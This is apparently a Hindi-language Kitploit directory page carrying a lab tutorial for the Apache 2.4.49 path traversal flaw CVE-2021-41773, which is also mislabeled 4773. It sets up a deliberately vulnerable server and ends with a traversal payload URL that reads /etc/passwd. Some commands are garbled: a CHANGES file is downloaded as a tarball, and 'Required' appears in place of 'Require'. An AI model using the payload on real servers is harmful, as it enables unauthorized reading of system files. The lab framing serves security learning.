Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-4773 — चरण-दर-चरण ट्यूटोरियल जो दर्शाता है कि कैसे एक कमजोर Apache 2.4.49 वातावरण स्थापित करें और Kali Linux तथा Ubuntu Server VMs का उपयोग करके CVE-2021-41773 पाथ ट्रैवर्सल का शोषण करें। | Kitploit
उपकरण/GitHubGitHub/alexs18/cve-2021-4773
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubalexs18/cve-2021-4773

CVE-2021-4773

चरण-दर-चरण ट्यूटोरियल जो दर्शाता है कि कैसे एक कमजोर Apache 2.4.49 वातावरण स्थापित करें और Kali Linux तथा Ubuntu Server VMs का उपयोग करके CVE-2021-41773 पाथ ट्रैवर्सल का शोषण करें।

रिपॉजिटरी देखें
210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-4773

यह एक अभ्यास का उदाहरण है कि कैसे वर्चुअल मशीन के साथ CVE-2021-4773 कमजोरी का शोषण किया जाए

इस ट्यूटोरियल के लिए आपको निम्नलिखित की आवश्यकता है

  • काली लिनक्स के रूप में वर्चुअल मशीन
  • उबंटू सर्वर के रूप में वर्चुअल मशीन
  • अपाचे संस्करण 2.4.49 स्थापित करें

तो चलिए शुरू करते हैं जब आपके पास 2 वर्चुअल मशीन चल रही हों, तो आप एक संग्रह रिपॉजिटरी से अपाचे संस्करण 2.4.49 स्थापित करेंगे आप यह संस्करण पा सकते हैं https://archive.apache.org/dist/httpd/CHANGES_2.4.49

उबंटू सर्वर में कमजोरी वाले संस्करण को स्थापित और कॉन्फ़िगर करें

1 पहली बार अपनी वर्चुअल मशीन सर्वर में निम्नलिखित कमांड चलाने की आवश्यकता है

root@kitploit:~
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  or wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 

2 दूसरी बार आपको इस संस्करण को अपाचे से इस प्रकार अनज़िप करना होगा

root@kitploit:~
tar -xvjf httpd-2.4.49.tar.bz2

3 निम्नलिखित पैकेज स्थापित करें

root@kitploit:~
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 मुख्य निर्देशिका में निष्पादन फ़ाइल (फ़ाइल नाम configure) चलाएँ, इंस्टॉल निर्देशिका निर्दिष्ट करने के लिए फ़्लैग का उपयोग करें

root@kitploit:~
./configure --prefix=/usr/local/apache2

5 कमजोरी वाले संस्करण को कंपाइल करें

root@kitploit:~
make

6 कमजोरी वाले संस्करण को स्थापित करें

root@kitploit:~
make install

7 संस्करण की समीक्षा करें

root@kitploit:~
ls /usr/local/apache2

8 प्रक्रिया शुरू करें

root@kitploit:~
/usr/local/apache2/bin/apachectl start
  

9 प्रक्रिया की पुष्टि करें

root@kitploit:~
ps aux | grep httpd

10 कमजोरी को कॉन्फ़िगर करें फ़ाइल /usr/local/apache2/conf/httpd.conf ढूंढें और डायरेक्टरी एडमिन को कॉन्फ़िगर करें डायरेक्टरी टैग ढूंढें और Require all denied को बदलें

root@kitploit:~
  Required all granted
  

Files .ht* टैग ढूंढें और Require all denied को बदलें

root@kitploit:~
  Required all granted

पहला परिवर्तन स्थानीय वातावरण में कमजोरी के शोषण के लिए है और दूसरा वास्तविक वातावरण में इसे उजागर करने के लिए है

काली लिनक्स में कमजोरी का शोषण करें

1 निम्नलिखित कमांड से nmap के साथ IP पता स्कैन करें

root@kitploit:~
nmap -sV ip_address

2 अपाचे सर्वर का परीक्षण करने के लिए curl या wget का उपयोग करें

root@kitploit:~
curl ip_address or make wget ip_address

3 यदि आप सिंटैक्स समझना चाहते हैं तो अगले पृष्ठ पर कमजोरी का शोषण कैसे करें, इसकी समीक्षा करें

root@kitploit:~
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

या बस निम्नलिखित पेलोड का उपयोग करें

root@kitploit:~
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
टूल डाउनलोड करें